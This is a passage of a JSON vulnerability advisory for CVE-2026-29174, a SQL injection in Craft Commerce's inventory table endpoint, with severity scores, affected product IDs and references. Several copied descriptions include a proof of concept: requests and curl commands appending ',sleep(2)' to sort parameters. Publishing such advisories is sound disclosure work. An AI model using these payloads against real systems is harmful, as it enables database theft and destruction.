                            }
                        ],
                        "category": "product_name",
                        "name": "commerce"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=5.0.0|<5.5.3",
                                "product": {
                                    "name": "vers:unknown/>=5.0.0|<5.5.3",
                                    "product_id": "CSAFPID-5795217",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "craft_commerce"
                    }
                ],
                "category": "vendor",
                "name": "craftcms"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-29174",
            "cwe": {
                "id": "CWE-89",
                "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nCraft Commerce is vulnerable to **SQL Injection** in the inventory levels table data endpoint. The `sort[0][direction]` and `sort[0][sortField]` parameters are concatenated directly into an `addOrderBy()` clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage inventory stock levels \n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** > **Inventory**\n3. Click on any sortable column header (e.g., \"SKU\") to trigger a sort request\n4. Intercept the request and modify `sort[0][direction]` or `sort[0][sortField]` parameters and append `,sleep(2)` payload to it's current value as follows:\n\n```bash\n# sort[0][sortField]=sku,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku,sleep(2)&sort[0][direction]=asc&inventoryLocationId=1&containerId=%23inventory-levels\n# sort[0][direction]=asc,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1&containerId=%23inventory-levels\n```\n\n6. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\n# sort[0][sortField]=sku,sleep(2)\ncurl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'\n# sort[0][direction]=asc,sleep(2)\ncurl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku&sort%5b0%5d%5bdirection%5d=asc,sleep(2)&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character using time-based techniques.\n- **Modify or destroy data** (drop tables, update records, alter schema).",
                    "title": "github - https://github.com/advisories/GHSA-pmgj-gmm4-jh6j"
                },
                {
                    "category": "description",
                    "text": "Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-29174"
                },
                {
                    "category": "description",
                    "text": "Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-29174"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nCraft Commerce is vulnerable to **SQL Injection** in the inventory levels table data endpoint. The `sort[0][direction]` and `sort[0][sortField]` parameters are concatenated directly into an `addOrderBy()` clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage inventory stock levels \n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** > **Inventory**\n3. Click on any sortable column header (e.g., \"SKU\") to trigger a sort request\n4. Intercept the request and modify `sort[0][direction]` or `sort[0][sortField]` parameters and append `,sleep(2)` payload to it's current value as follows:\n\n```bash\n# sort[0][sortField]=sku,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku,sleep(2)&sort[0][direction]=asc&inventoryLocationId=1&containerId=%23inventory-levels\n# sort[0][direction]=asc,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1&containerId=%23inventory-levels\n```\n\n6. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\n# sort[0][sortField]=sku,sleep(2)\ncurl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'\n# sort[0][direction]=asc,sleep(2)\ncurl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku&sort%5b0%5d%5bdirection%5d=asc,sleep(2)&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character using time-based techniques.\n- **Modify or destroy data** (drop tables, update records, alter schema).",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-pmgj-gmm4-jh6j.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nCraft Commerce is vulnerable to **SQL Injection** in the inventory levels table data endpoint. The `sort[0][direction]` and `sort[0][sortField]` parameters are concatenated directly into an `addOrderBy()` clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise.\n\n---\n## PoC\n### Required Permissions\n- General\n\t- Access the control panel\n\t- Access Craft Commerce\n- Craft Commerce\n\t- Manage inventory stock levels \n\n### Steps to reproduce\n1. Log in to the control panel\n2. Navigate to **Commerce** > **Inventory**\n3. Click on any sortable column header (e.g., \"SKU\") to trigger a sort request\n4. Intercept the request and modify `sort[0][direction]` or `sort[0][sortField]` parameters and append `,sleep(2)` payload to it's current value as follows:\n\n```bash\n# sort[0][sortField]=sku,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku,sleep(2)&sort[0][direction]=asc&inventoryLocationId=1&containerId=%23inventory-levels\n# sort[0][direction]=asc,sleep(2)\nGET /index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort[0][sortField]=sku&sort[0][direction]=asc,sleep(2)&inventoryLocationId=1&containerId=%23inventory-levels\n```\n\n6. Observe the delay in the response, confirming the injection\n\nAlternatively, you can use the following `curl` (bash syntax) command (replace cookie and target domain as needed):\n```bash\n# sort[0][sortField]=sku,sleep(2)\ncurl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku,sleep(2)&sort%5b0%5d%5bdirection%5d=asc&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'\n# sort[0][direction]=asc,sleep(2)\ncurl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin/actions/commerce/inventory/inventory-levels-table-data&sort%5b0%5d%5bfield%5d=purchasable&sort%5b0%5d%5bsortField%5d=sku&sort%5b0%5d%5bdirection%5d=asc,sleep(2)&page=1&per_page=25&inventoryLocationId=1&containerId=%23inventory-levels'\n```\n\n### Impact\nWith this Blind SQLi, an attacker can:\n- **Exfiltrate data** character-by-character using time-based techniques.\n- **Modify or destroy data** (drop tables, update records, alter schema).",
                    "title": "github - https://api.github.com/advisories/GHSA-pmgj-gmm4-jh6j"
                },
                {
                    "category": "other",
                    "text": "0.00011",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.7",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "3.5",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5778720",
                    "CSAFPID-5501249",
                    "CSAFPID-5501250",
                    "CSAFPID-5501251",
                    "CSAFPID-5501252",
                    "CSAFPID-5501253",
                    "CSAFPID-5501254",
                    "CSAFPID-5501255",
                    "CSAFPID-5501256",
                    "CSAFPID-5501257",
                    "CSAFPID-5501258",
                    "CSAFPID-5501259",
                    "CSAFPID-5501260",
                    "CSAFPID-5501261",
                    "CSAFPID-5501262",
                    "CSAFPID-5501263",
                    "CSAFPID-5501264",
                    "CSAFPID-5501265",
                    "CSAFPID-5501266",
                    "CSAFPID-5501267",
                    "CSAFPID-5501268",
                    "CSAFPID-5501269",
                    "CSAFPID-5501270",
                    "CSAFPID-5501271",
                    "CSAFPID-5501272",
                    "CSAFPID-5501273",
                    "CSAFPID-5501274",
                    "CSAFPID-5501275",
                    "CSAFPID-5501276",
                    "CSAFPID-5501277",
                    "CSAFPID-5501278",
                    "CSAFPID-5501279",
                    "CSAFPID-5501280",
                    "CSAFPID-5501281",
                    "CSAFPID-5501282",
                    "CSAFPID-5501283",
                    "CSAFPID-5501284",
                    "CSAFPID-5501285",
                    "CSAFPID-5501286",
                    "CSAFPID-5501287",
                    "CSAFPID-5501288",
                    "CSAFPID-5501289",
                    "CSAFPID-5501290",
                    "CSAFPID-5501291",
                    "CSAFPID-5501292",
                    "CSAFPID-5501293",
                    "CSAFPID-5501294",
                    "CSAFPID-5501295",
                    "CSAFPID-5501296",
                    "CSAFPID-5501297",
                    "CSAFPID-5501298",
                    "CSAFPID-5501299",
                    "CSAFPID-5501300",
                    "CSAFPID-5501301",
                    "CSAFPID-5501302",
                    "CSAFPID-5501303",
                    "CSAFPID-5501304",
                    "CSAFPID-5501305",
                    "CSAFPID-5501306",
                    "CSAFPID-5501307",
                    "CSAFPID-5501308",
                    "CSAFPID-5501309",
                    "CSAFPID-5501310",
                    "CSAFPID-5501311",
                    "CSAFPID-5501312",
                    "CSAFPID-5501313",
                    "CSAFPID-5501314",
                    "CSAFPID-5501315",
                    "CSAFPID-5501316",
                    "CSAFPID-5501317",
                    "CSAFPID-5501318",
                    "CSAFPID-5501319",
                    "CSAFPID-5501320",
                    "CSAFPID-5501321",
                    "CSAFPID-5501322",
                    "CSAFPID-5501323",
                    "CSAFPID-5501324",
                    "CSAFPID-5501325",
                    "CSAFPID-5501326",
                    "CSAFPID-5501327",
                    "CSAFPID-5501328",
                    "CSAFPID-5501329",
                    "CSAFPID-5501330",
                    "CSAFPID-5501331",
                    "CSAFPID-5501332",
                    "CSAFPID-5501333",
                    "CSAFPID-5501334",
                    "CSAFPID-5780632",
                    "CSAFPID-5780633",
                    "CSAFPID-5795217"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://github.com/advisories/GHSA-pmgj-gmm4-jh6j"
                },
                {
                    "category": "external",
                    "summary": "Source raw - github",
                    "url": "https://api.github.com/advisories/GHSA-pmgj-gmm4-jh6j"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29174"
                },
                {
                    "category": "external",
                    "summary": "Source raw - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-29174"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://www.cve.org/CVERecord?id=CVE-2026-29174"
                },
                {
                    "category": "external",
                    "summary": "Source raw - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/29xxx/CVE-2026-29174.json"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-pmgj-gmm4-jh6j.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29174"
                },
                {
                    "category": "external",
                    "summary": "Source raw - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-pmgj-gmm4-jh6j"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/craftcms/commerce/security/advisories/GHSA-pmgj-gmm4-jh6j"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/craftcms/commerce/commit/094d69df24b925544f337c38e2ec1effcd5395c7"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/craftcms/commerce/commit/a2ea853935ef03297ea1298bdb0d8c55ec5daf7b"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-pmgj-gmm4-jh6j"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29174"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                        "baseScore": 8.8,
                        "baseSeverity": "HIGH"
                    },
                    "products": [
                        "CSAFPID-5501249",
                        "CSAFPID-5501250",
                        "CSAFPID-5501251",
                        "CSAFPID-5501252",
                        "CSAFPID-5501253",
                        "CSAFPID-5501254",
                        "CSAFPID-5501255",
                        "CSAFPID-5501256",
                        "CSAFPID-5501257",
                        "CSAFPID-5501258",
                        "CSAFPID-5501259",
                        "CSAFPID-5501260",
                        "CSAFPID-5501261",
                        "CSAFPID-5501262",
                        "CSAFPID-5501263",
                        "CSAFPID-5501264",
                        "CSAFPID-5501265",
                        "CSAFPID-5501266",
                        "CSAFPID-5501267",
                        "CSAFPID-5501268",
                        "CSAFPID-5501269",
                        "CSAFPID-5501270",
                        "CSAFPID-5501271",
                        "CSAFPID-5501272",
                        "CSAFPID-5501273",
                        "CSAFPID-5501274",
                        "CSAFPID-5501275",
                        "CSAFPID-5501276",
                        "CSAFPID-5501277",
                        "CSAFPID-5501278",
                        "CSAFPID-5501279",
                        "CSAFPID-5501280",
                        "CSAFPID-5501281",
                        "CSAFPID-5501282",
                        "CSAFPID-5501283",
                        "CSAFPID-5501284",
                        "CSAFPID-5501285",
                        "CSAFPID-5501286",
                        "CSAFPID-5501287",
                        "CSAFPID-5501288",
                        "CSAFPID-5501289",
                        "CSAFPID-5501290",
                        "CSAFPID-5501291",
                        "CSAFPID-5501292",
                        "CSAFPID-5501293",
                        "CSAFPID-5501294",
                        "CSAFPID-5501295",
                        "CSAFPID-5501296",
                        "CSAFPID-5501297",
                        "CSAFPID-5501298",
                        "CSAFPID-5501299",
                        "CSAFPID-5501300",
                        "CSAFPID-5501301",
                        "CSAFPID-5501302",
                        "CSAFPID-5501303",
                        "CSAFPID-5501304",
                        "CSAFPID-5501305",
                        "CSAFPID-5501306",
                        "CSAFPID-5501307",
                        "CSAFPID-5501308",
                        "CSAFPID-5501309",
                        "CSAFPID-5501310",
                        "CSAFPID-5501311",
                        "CSAFPID-5501312",
                        "CSAFPID-5501313",
                        "CSAFPID-5501314",
                        "CSAFPID-5501315",
                        "CSAFPID-5501316",
                        "CSAFPID-5501317",
                        "CSAFPID-5501318",
                        "CSAFPID-5501319",
                        "CSAFPID-5501320",
                        "CSAFPID-5501321",
                        "CSAFPID-5501322",
                        "CSAFPID-5501323",
                        "CSAFPID-5501324",
                        "CSAFPID-5501325",
                        "CSAFPID-5501326",
                        "CSAFPID-5501327",
                        "CSAFPID-5501328",
                        "CSAFPID-5501329",
                        "CSAFPID-5501330",
                        "CSAFPID-5501331",
                        "CSAFPID-5501332",
                        "CSAFPID-5501333",
                        "CSAFPID-5501334",
                        "CSAFPID-5778720",
                        "CSAFPID-5780632",
                        "CSAFPID-5780633",
                        "CSAFPID-5795217"
                    ]
                }
            ],
            "title": "CVE-2026-29174"
        }
    ]
}